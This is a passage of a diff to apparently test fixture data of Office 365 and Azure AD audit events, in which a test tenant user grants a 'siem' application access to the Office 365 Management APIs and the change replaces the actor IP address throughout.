Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -5876,9 +5876,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:25:54", "ExtendedProperties": [ { @@ -6081,7 +6081,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7823970Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793206\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"606ae654-e71e-4a6b-a07c-85acd775667b\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7823970Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793206\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"606ae654-e71e-4a6b-a07c-85acd775667b\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -6111,9 +6111,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:25:54", "ExtendedProperties": [ { @@ -6328,7 +6328,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -6358,9 +6358,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:05", "ExtendedProperties": [ { @@ -6594,7 +6594,7 @@ }, { "event": { - "original": 